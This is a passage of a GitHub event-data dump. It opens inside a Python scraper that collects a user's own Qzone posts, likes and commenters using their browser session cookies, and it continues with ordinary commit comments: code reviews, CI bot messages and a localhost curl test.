self.web.get('https://user.qzone.qq.com/{}'.format(self.__username))\r\n        cookie = ''\r\n        for elem in self.web.get_cookies():\r\n            cookie += elem[\"name\"] + \"=\" + elem[\"value\"] + \";\"\r\n        self.cookies = cookie\r\n        self.get_g_tk()\r\n        self.headers['Cookie'] = self.cookies\r\n        self.web.quit()\r\n\r\n    # 构造获取动态的URL\r\n    def get_mood_url(self):\r\n        url = 'https://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?'\r\n        params = {\r\n            \"sort\": 0,\r\n            \"start\": 0,\r\n            \"num\": 20,\r\n            \"cgi_host\": \"http://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6\",\r\n            \"replynum\": 100,\r\n            \"callback\": \"_preloadCallback\",\r\n            \"code_version\": 1,\r\n            \"inCharset\": \"utf-8\",\r\n            \"outCharset\": \"utf-8\",\r\n            \"notice\": 0,\r\n            \"format\": \"jsonp\",\r\n            \"need_private_comment\": 1,\r\n            \"g_tk\": self.g_tk\r\n        }\r\n        url = url + parse.urlencode(params)\r\n        return url\r\n\r\n    # 构造点赞的人的URL\r\n    def get_aggree_url(self):\r\n        url = 'https://user.qzone.qq.com/proxy/domain/users.qzone.qq.com/cgi-bin/likes/get_like_list_app?'\r\n        params = {\r\n            \"uin\": self.__username,\r\n            \"unikey\": self.unikey,\r\n            \"begin_uin\": 0,\r\n            \"query_count\": 60,\r\n            \"if_first_page\": 1,\r\n            \"g_tk\": self.g_tk,\r\n        }\r\n        url = url + parse.urlencode(params)\r\n        return url\r\n\r\n    # 构造获取动态详情的url\r\n    def get_mood_detail_url(self):\r\n        url = 'https://user.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msgdetail_v6?'\r\n        params = {\r\n            \"uin\": self.__username,\r\n            \"unikey\": self.unikey,\r\n            \"tid\": self.tid,\r\n            \"t1_source\": 1,\r\n            \"ftype\": 0,\r\n            \"sort\": 0,\r\n            \"pos\": 0,\r\n            \"num\": 20,\r\n            \"callback\": \"_preloadCallback\",\r\n            \"code_version\": 1,\r\n            \"format\": \"jsonp\",\r\n            \"need_private_comment\": 1,\r\n            \"g_tk\": self.g_tk\r\n        }\r\n        url = url + parse.urlencode(params)\r\n        return url\r\n\r\n    #   获取点赞总数URL \r\n    def get_firstpage_url(self):\r\n        url='https://user.qzone.qq.com/proxy/domain/r.qzone.qq.com/cgi-bin/user/qz_opcnt2?'\r\n        params={\r\n            #\"_stp\":self.__username,\r\n            \"unikey\":self.firstunikey,\r\n            \"fupdate\":1,\r\n            \"g_tk\":self.g_tk,\r\n            \"qzonetoken\":self.qzonetoken,\r\n            \"g_tk\":self.g_tk\r\n        }\r\n        url=url+parse.urlencode(params)\r\n        return url\r\n\r\n    def get_secondpage_url(self):\r\n        url='https://user.qzone.qq.com/proxy/domain/r.qzone.qq.com/cgi-bin/user/qz_opcnt2?'\r\n        params={\r\n            #\"_stp\":self.__username,\r\n            \"unikey\":self.secondunikey,\r\n            \"fupdate\":1,\r\n            \"g_tk\":self.g_tk,\r\n            \"qzonetoken\":self.qzonetoken,\r\n            \"g_tk\":self.g_tk\r\n        }\r\n        url=url+parse.urlencode(params)\r\n        return url\r\n\r\n    # 将响应字符串转化为标准Json\r\n    def get_json(self, str1):\r\n        arr = re.findall(r'[^()]+', str1)\r\n        json = \"\"\r\n        for i in range(1, len(arr) - 1):\r\n            json += arr[i]\r\n        return json\r\n    #一维数组变为二维数组\r\n    def trans_data_to_pair(self,data,index):  \r\n        contents=[  \r\n            data[i:i+index]  \r\n            for i in range(0,len(data),index)  \r\n        ]  \r\n        #print(contents)\r\n        return(contents)\r\n\r\n\r\n    # 获取动态详情列表（一页20个）\r\n    def get_mood_list(self):\r\n        urlMood = self.get_mood_url()\r\n        url_Mood = urlMood + '&uin=' + str(self.__username)\r\n        pos = 0\r\n        while pos < all_pos:\r\n            url__ = url_Mood + '&pos=' + str(pos)\r\n            mood_list = self.req.get(url=url__, headers=self.headers)\r\n            jsonContent = self.get_json(str(mood_list.content.decode('utf-8')))\r\n            self.content.append(jsonContent)\r\n            # print(jsonContent)\r\n            # 获取每条动态的unikey\r\n            self.unikeys = self.get_unilikeKey(jsonContent)\r\n            #获取点赞总数的列表\r\n            self.firstunikey=self.get_firstallunikey(jsonContent)\r\n            self.secondunikey=self.get_secondallunikey(jsonContent)\r\n\r\n            firstpage_list=[]\r\n            secondpage_list=[]\r\n            url1=self.get_firstpage_url()\r\n            print(url1)\r\n            url2=self.get_secondpage_url()\r\n            firstpage=self.req.get(url=url1,headers=self.headers)\r\n            #print(firstpage)\r\n            firstpagelist=self.get_json(firstpage.content.decode('utf-8'))\r\n            #print(\"firstpagelist + ###############\" + firstpagelist)\r\n            firstpage_list.append(firstpagelist)\r\n            #print(\"firstpage_list:    \" + str(firstpage_list))\r\n\r\n            secondpagelist=self.req.get(url=url2,headers=self.headers)\r\n            secondpagelist=self.get_json(secondpagelist.content.decode('utf-8'))\r\n            secondpage_list.append(secondpagelist)\r\n\r\n            self.page_list=firstpage_list+secondpage_list\r\n            with open('data/pagelist' + str(pos) + '.json', 'w', encoding='utf-8') as w4:\r\n                json.dump(self.page_list, w4, ensure_ascii=False)\r\n           # print(url1)\r\n\r\n            # 获取点赞的人的详情列表\r\n            for unikey in self.unikeys:\r\n                #print('unikey' + unikey)\r\n                self.unikey = unikey\r\n                like_detail = self.get_like_list()\r\n\r\n                self.like_list_names.append(like_detail)\r\n                self.tid = self.get_tid(unikey)\r\n\r\n                # 获取动态详情\r\n                mood_detail = self.get_mood_detail()\r\n                self.mood_details.append(mood_detail)\r\n            # print('1272082503', jsonContent)\r\n\r\n            # 存储到json文件\r\n            with open('data/data' + str(pos) + '.json', 'w', encoding='utf-8') as w:\r\n                w.write(jsonContent)\r\n            pos += 20\r\n\r\n\r\n        # print(self.content)\r\n        # 保存所有数据到指定文件\r\n        with open('data/like' + '.json', 'w', encoding='utf-8') as w2:\r\n            json.dump(self.like_list_names, w2, ensure_ascii=False)\r\n\r\n        with open('data/mood_detail' + '.json', 'w', encoding='utf-8') as w3:\r\n            json.dump(self.mood_details, w3, ensure_ascii=False)\r\n\r\n        print(\"finish\")\r\n\r\n    # 获得点赞的人\r\n    def get_like_list(self):\r\n        url = self.get_aggree_url()\r\n        #print(url)\r\n        like_list = self.req.get(url=url, headers=self.headers)\r\n        like_list_detail = self.get_json(like_list.content.decode('utf-8'))\r\n        # like_list_detail = like_list_detail.replace('\\\\n', '')\r\n        # print(like_list_detail)\r\n        # print(\"success to get like list\")\r\n        return like_list_detail\r\n\r\n    # 获得每一条说说的详细内容\r\n    def get_mood_detail(self):\r\n        urlDetail = self.get_mood_detail_url()\r\n        # print(urlDetail)\r\n        mood_detail = self.req.get(url=urlDetail, headers=self.headers)\r\n        json_mood = self.get_json(str(mood_detail.content.decode('utf-8')))\r\n\r\n        return json_mood\r\n\r\n    # 根据unikey 获得tid\r\n    def get_tid(self, unikey):\r\n        # unikey是链接，形如：http://user.qzone.qq.com/1272082503/mood/4770d24bc5bb7459cc140200.1\r\n        # 其中，4770d24bc5bb7459cc14020是tid\r\n        tids = unikey.split(\"/\")\r\n        tid = tids[5].split(\".\")\r\n        return tid[0]\r\n\r\n    # 核心加密字段\r\n    def get_g_tk(self):\r\n        p_skey = self.cookies[self.cookies.find('p_skey=') + 7: self.cookies.find(';', self.cookies.find('p_skey='))]\r\n        h = 5381\r\n        for i in p_skey:\r\n            h += (h << 5) + ord(i)\r\n        print('g_tk', h & 2147483647)\r\n        self.g_tk = h & 2147483647\r\n\r\n    # 这里是从每条说说的图片地址中截取unikey，如果该条说说没有图片，则获取不到\r\n    # unikey 是用于辨别每条说说的唯一识别码\r\n    def get_unilikeKey(self, mood_detail):\r\n        allunikey = []\r\n        jsonData = json.loads(mood_detail)\r\n        # print(jsonData)\r\n        for item in jsonData['msglist']:\r\n            # print(item.keys())\r\n            if 'pic' in item:\r\n                itemKey = item['pic']\r\n                if 'curlikekey' in itemKey[0]:\r\n                    unikey = itemKey[0]['curlikekey'].split('^||^')\r\n                    #print('unikey:' + unikey[0])\r\n                    allunikey.append(unikey[0])\r\n        return allunikey\r\n\r\n    def get_firstallunikey(self,mood_detail):\r\n        allunikey=[]\r\n        firstallunilikekey=[]\r\n        array=[]\r\n\r\n        jsonData=json.loads(mood_detail)\r\n        for item in jsonData['msglist']:\r\n            if 'pic' in item:\r\n                itemkey=item['pic']\r\n                if 'curlikekey' in itemkey[0]:\r\n                    unikey = itemkey[0]['curlikekey'].split('^||^')\r\n                    #print('unikey:' + unikey[0])\r\n                    allunikey.append(unikey[0])\r\n        firstallunilikekey=self.trans_data_to_pair(allunikey,10)\r\n        l=firstallunilikekey[0]\r\n        a=firstallunilikekey[0]\r\n\r\n        cout=0\r\n        for i in range(1,11):\r\n            if i==1:\r\n\r\n                a.insert(i,'<.>'+str(l[1-1])+'<|>')\r\n                cout=+1\r\n                print(cout)\r\n            else:\r\n                a.insert(i+cout,'<.>'+str(l[i-1])+'<|>')\r\n                cout=cout+1\r\n                print(cout)\r\n            print(a)  \r\n        data=''.join(a)\r\n       # print(\"firstallunilikekey:\" + data)\r\n        return data\r\n\r\n    def get_secondallunikey(self,mood_detail):\r\n        allunikey=[]\r\n        firstallunilikekey=[]\r\n        array=[]\r\n\r\n        jsonData=json.loads(mood_detail)\r\n        for item in jsonData['msglist']:\r\n            if 'pic' in item:\r\n                itemkey=item['pic']\r\n                if 'curlikekey' in itemkey[0]:\r\n                    unikey = itemkey[0]['curlikekey'].split('^||^')\r\n                    #print('unikey:' + unikey[0])\r\n                    allunikey.append(unikey[0])\r\n        firstallunilikekey=self.trans_data_to_pair(allunikey,10)\r\n        l=firstallunilikekey[1]\r\n        a=firstallunilikekey[1]\r\n\r\n        cout=0\r\n        for i in range(1,11):\r\n            if i==1:\r\n\r\n                a.insert(i,'<.>'+str(l[1-1])+'<|>')\r\n                cout=+1\r\n                print(cout)\r\n            else:\r\n                a.insert(i+cout,'<.>'+str(l[i-1])+'<|>')\r\n                cout=cout+1\r\n                print(cout)\r\n            print(a)  \r\n        data=''.join(a)\r\n       # print(\"firstallunilikekey:\" + data)\r\n        return data\r\n\r\ndef doAnalysis(file_name, commentNumber, commentList):\r\n    f = open(file_name, encoding='utf-8')\r\n    data = json.load(f)\r\n    agreeDict = []\r\n    for item in data['msglist']:\r\n        time_local = time.localtime(item['created_time'])\r\n        # 转换成新的时间格式(2016-05-05 20:28:54)\r\n\r\n        dt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_local)\r\n        if 'pic' in item:\r\n            itemKey = item['pic']\r\n            if 'curlikekey' in itemKey[0]:\r\n                unikey = itemKey[0]['curlikekey'].split('^||^')\r\n                # print(unikey)\r\n        if 'commentlist' in item:\r\n            commentNumber.append(len(item['commentlist']))\r\n            for item2 in item['commentlist']:\r\n                if item2['name'] in commentList:\r\n                    commentList[item2['name']] += 1\r\n                else:\r\n                    commentList[item2['name']] = 1\r\n                    # print(item2['name'])\r\n        else:\r\n            commentNumber.append(0)\r\n    f.close()\r\n\r\ndef analysispagelist(file_name, likeNumbe):\r\n    f = open(file_name, encoding='utf-8')\r\n    likeNumber=[]\r\n    alllikeNumber=[]\r\n    allnumber=[]\r\n    data = json.load(f)\r\n    for item in data:\r\n        item=json.loads(item)\r\n        number=item['data']\r\n        item=str(number)\r\n        #print(item)\r\n        a=re.findall(r\"'like':(.+?)'share'\",item)\r\n        likeNumber.append(a)\r\n    alllikeNumber=likeNumber[0]+likeNumber[1]\r\n    #print(alllikeNumber)\r\n    ab=''.join(alllikeNumber)\r\n    #print(ab)\r\n    ab=ab.replace(',','')\r\n    #print(ab)\r\n    alllikeNumber=ab.split('  ')\r\n    #print(alllikeNumber[0])\r\n    for i in alllikeNumber:\r\n        allnumber.append(i)\r\n    #print(allnumber)\r\n    return allnumber\r\n\r\n\r\n\r\ndef analysisMoodDetails():\r\n    f = open('data/mood_detail.json', encoding='utf-8')\r\n    data = json.load(f)\r\n    mood_words = \"\"\r\n    for item in data:\r\n        mood = json.loads(item)\r\n        # print(mood.keys())\r\n        mood_words += mood['content']\r\n    with open('data/mood_details.txt', 'w', encoding='utf-8') as mood_writer:\r\n        mood_writer.write(mood_words)\r\n\r\n# 计算点赞的人、评论的人\r\ndef calculate_info():\r\n    commentList = {}\r\n    commentNumber = []\r\n    likeNumber=[]\r\n    alllikeNumber=[]\r\n    alllike=[]\r\n    pos = 0\r\n    while pos < all_pos:\r\n        fileName = 'data/data' + str(pos) + '.json'\r\n        doAnalysis(fileName, commentNumber,commentList)\r\n        fileName1='data/pagelist'+str(pos)+'.json'\r\n        alllikeNumber=analysispagelist(fileName1,likeNumber)\r\n        pos += 20\r\n        alllike=alllike+alllikeNumber\r\n    f = open('data/like.json', encoding='utf-8')\r\n    data = json.load(f)\r\n    totalAgree = 0\r\n    agreeNick = {}\r\n    agreeNumberList = []\r\n    for item in data:\r\n        item = json.loads(item)\r\n        uin_data = item['data']\r\n        totalAgree += int(uin_data['total_number'])\r\n        agreeNumberList.append(uin_data['total_number'])\r\n        # print(str(agreeNumberList))\r\n        for item_uin in uin_data['like_uin_info']:\r\n            if item_uin['nick'] in agreeNick:\r\n                agreeNick[item_uin['nick']] += 1\r\n            else:\r\n                agreeNick[item_uin['nick']] = 1\r\n    #agreeNumberList.sort(reverse=True)\r\n    commentNumber.sort(reverse=True)\r\n\r\n    #平均点赞数\r\n    totallike=0\r\n    for i in alllike:\r\n        totallike=int(i)+totallike\r\n\r\n    print(\"累计点赞数：\" + str(totallike))\r\n    print(\"平均点赞数\" + str(totallike / all_pos))\r\n    print(\"点赞次数\" + str(alllike))\r\n    print(\"点赞的人：\" + str(sorted(agreeNick.items(), key=lambda item2: item2[1], reverse=True)))\r\n    # print(\"评论数:\" + str(commentNumber))\r\n    print(\"给我评论的人：\" + str(sorted(commentList.items(), key=lambda nameItem: nameItem[1], reverse=True)))\r\n    print(\"finish\")\r\n    f.close()\r\n\r\n\r\ndef capture_data():\r\n    sp = Spider()\r\n    sp.login()\r\n    print(\"Login success\")\r\n    sp.get_mood_list()\r\n    print(\"Finish to capture\")\r\n\r\nif __name__ == '__main__':\r\n    # 执行capture_data以为的函数时请注释掉capture_data\r\n    all_pos=100\r\n    \r\n    capture_data()\r\n    # 计算一些信息\r\n    calculate_info()\r\n    # analysisMoodDetails()"}},"created_at":"2018-07-31T09:38:29Z"}
{"id":"8042911524","type":"CommitCommentEvent","actor":{"login":"Superjomn"},"repo":{"name":"PaddlePaddle/Paddle"},"payload":{"comment":{"id":29901097,"position":6,"line":47,"path":"paddle/fluid/inference/api/api_anakin_engine_tester.cc","commit_id":"d255ac531fac51f1a26578de291bc7ef2bb1db4c","created_at":"2018-07-31T09:38:31Z","updated_at":"2018-07-31T09:38:31Z","author_association":"CONTRIBUTOR","body":"建议像 https://github.com/PaddlePaddle/Paddle/blob/develop/paddle/fluid/inference/api/api_anakin_engine_tester.cc#L40"}},"created_at":"2018-07-31T09:38:31Z"}
{"id":"8042913535","type":"CommitCommentEvent","actor":{"login":"puruhirave"},"repo":{"name":"puruhirave/DesignPatterns"},"payload":{"comment":{"id":29901103,"position":null,"line":null,"path":null,"commit_id":"9afaf0cb907e494afeda02fd8a9adf05ef824572","created_at":"2018-07-31T09:38:55Z","updated_at":"2018-07-31T09:38:55Z","author_association":"OWNER","body":"Unique pointer used because after creating basic raw momo object its ownership is given from manufacturer to seller. So seller is an Decorator who can take ownership now and decorate the object."}},"created_at":"2018-07-31T09:38:55Z"}
{"id":"8042915481","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29901106,"position":null,"line":null,"path":null,"commit_id":"33530b504f812dcdf7860458eb14cf9a61213886","created_at":"2018-07-31T09:39:17Z","updated_at":"2018-07-31T09:39:17Z","author_association":"COLLABORATOR","body":"I didn't eventually use `showEFloat` to print out scientific notation although it would work for scientific but not engineering notation.\r\n\r\nI thought we are going to use the Engineering notation which means that the exponent should always been the result after multiplying 3. \r\n\r\nSo I looked into `showEFloat` 's source code and I found it is using a function call \"floatToDigits\" which takes a float number and a base and then give out exponent and a list of [Int] of the digits of the base number. Like `1234`, if we choose 10 as base, then it gives out list = [1, 2, 3, 4] and exponent as 4 cause it will recognize 1234 as 0.1234^4. This function replace function \"getBaseTen\" function I wrote before because that simple calculation function has precision problem for double. So I generate a similar way as `showEFloat` to print Engineering Notation. This would work in Tex file too.\r\n\r\nWe were using `Int Integer`, but since I use function `floatToDigits` which gives out `Int`. So `Int Int` now is just assistant for this function. I thought about `Int -> Integer`, but seems that function is not included in base.\r\n\r\n`P.Point` is actually `P.Comma`, so it is different from 'P.Dot'. I was thinking about these two name, `point` is more meaningful but `comma` is more straightforward. I think they are all ok. \r\n\r\nThose imports if they are useless, I will eventually remove them. The tail and head and etc. They were just helping me finding bugs, I won't use them. And I think I have removed them in next comment.\r\n\r\nIn case some commits doesn't show the current final work, I usually use the pull request. When I don't actually create a pull request but only use comparing to compare two branches, all the currently final changes would show up. Hope you think this is the better way to check the work. Since sometimes, my commits doesn't really have a specific aim or I undo something in the next commits."}},"created_at":"2018-07-31T09:39:17Z"}
{"id":"8042915788","type":"CommitCommentEvent","actor":{"login":"Kami"},"repo":{"name":"StackStorm/st2"},"payload":{"comment":{"id":29901107,"position":86,"line":267,"path":"st2common/st2common/util/pack_management.py","commit_id":"5513b7d73f137e68290aa06c3068875535b23728","created_at":"2018-07-31T09:39:20Z","updated_at":"2018-07-31T09:39:20Z","author_association":"MEMBER","body":"Previously we had no logging which wasn't ideal so I added some."}},"created_at":"2018-07-31T09:39:20Z"}
{"id":"8042919836","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901110,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-31T09:40:05Z","updated_at":"2018-07-31T09:40:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:40:05Z"}
{"id":"8042920071","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29901111,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:40:08Z","updated_at":"2018-07-31T09:40:08Z","author_association":"CONTRIBUTOR","body":"??? There is nothing personal here. No idea what media player changes you are talking about.\r\n\r\nObviously this method has been made for PLi where there is no automation for .po creation."}},"created_at":"2018-07-31T09:40:08Z"}
{"id":"8042920747","type":"CommitCommentEvent","actor":{"login":"jp9000"},"repo":{"name":"obsproject/obs-browser"},"payload":{"comment":{"id":29901113,"position":null,"line":null,"path":null,"commit_id":"98fd1c211a01555b6a36a6edca23b585a957a74d","created_at":"2018-07-31T09:40:15Z","updated_at":"2018-07-31T09:40:15Z","author_association":"MEMBER","body":"Yea."}},"created_at":"2018-07-31T09:40:15Z"}
{"id":"8042922204","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901121,"position":1,"line":1,"path":"normalize.css","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:40:30Z","updated_at":"2018-07-31T09:40:30Z","author_association":"NONE","body":"Для загрузки сторонних библиотек используй [`npm` или `yarn`](https://www.npmjs.com/package/normalize.css)\r\n"}},"created_at":"2018-07-31T09:40:30Z"}
{"id":"8042922565","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901122,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T09:40:34Z","updated_at":"2018-07-31T09:40:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:40:34Z"}
{"id":"8042923742","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29901123,"position":39,"line":46,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T09:40:47Z","updated_at":"2018-07-31T09:40:47Z","author_association":"NONE","body":"forward_index это лишний уровень абстракции. Тут получается преждевременная оптимизация. Все, что нам нужно сделать тут, это найти в массиве станции `@route` станцию под индексом current_index + 1. Если там нет такой станции - вернуть nil. В руби, все кроме nil и false интерпретируется как \"правдивые\" значения. То есть методы/объекты/прочее можно подставить в if выражение, и если они не вычислятся в nil или false, то код внутри условия будет выполнен\r\n\r\nИ дальше в теле метода go_forward можно будет сделать так\r\n```\r\nif forward_station\r\n  - говорим текущей станции, что поезд уехал\r\n  - говорим следующей станции, что поезд приехал\r\n  - инкрементим индекс текущей станции\r\n```"}},"created_at":"2018-07-31T09:40:47Z"}
{"id":"8042924466","type":"CommitCommentEvent","actor":{"login":"liuqun"},"repo":{"name":"ghego/tensorflow-mnist"},"payload":{"comment":{"id":29901126,"position":null,"line":null,"path":null,"commit_id":"4e84b14e959ba112427759f22b7470c42947f140","created_at":"2018-07-31T09:40:55Z","updated_at":"2018-07-31T09:40:55Z","author_association":"NONE","body":"The web page looks to be wrong after changing `y` to `logits`.\r\nMaybe a `softmax` should be add in to main.py...\r\n\r\n@ghego , does the current web page works for you?\r\n\r\nI used to debug web api with `curl`:\r\n```\r\n# Create a json array (Length: 28*28=784 pixels; Color value 0~255: from black to white)\r\ncat > data.json << EOF\r\n[254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254,254]\r\nEOF\r\n```\r\n\r\n```\r\n# Send data.json to web backend\r\ncurl -H \"Content-type: application/json\" \\\r\n\t-X POST -d @data.json \\\r\n    http://127.0.0.1:8000/api/mnist\r\n```"}},"created_at":"2018-07-31T09:40:55Z"}
{"id":"8042929477","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29901132,"position":1,"line":1,"path":"main.css","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:41:50Z","updated_at":"2018-07-31T09:41:50Z","author_association":"NONE","body":"Никогда не добавляй в гит скомпилированные файлы\r\nИспользуй [`.gitignore`](https://git-scm.com/docs/gitignore) чтоб они не попадали в коммиты"}},"created_at":"2018-07-31T09:41:50Z"}
{"id":"8042930453","type":"CommitCommentEvent","actor":{"login":"NHuyHoang"},"repo":{"name":"NHuyHoang/plc_s71200"},"payload":{"comment":{"id":29901133,"position":6,"line":18,"path":"view/index.html","commit_id":"5a6a6a99dffcbe3f237f8784dc798ac5fcaea77b","created_at":"2018-07-31T09:42:02Z","updated_at":"2018-07-31T09:42:02Z","author_association":"OWNER","body":"sai roi"}},"created_at":"2018-07-31T09:42:02Z"}
{"id":"8042932531","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901137,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-31T09:42:24Z","updated_at":"2018-07-31T09:42:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:42:24Z"}
{"id":"8042932777","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901138,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-31T09:42:27Z","updated_at":"2018-07-31T09:42:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 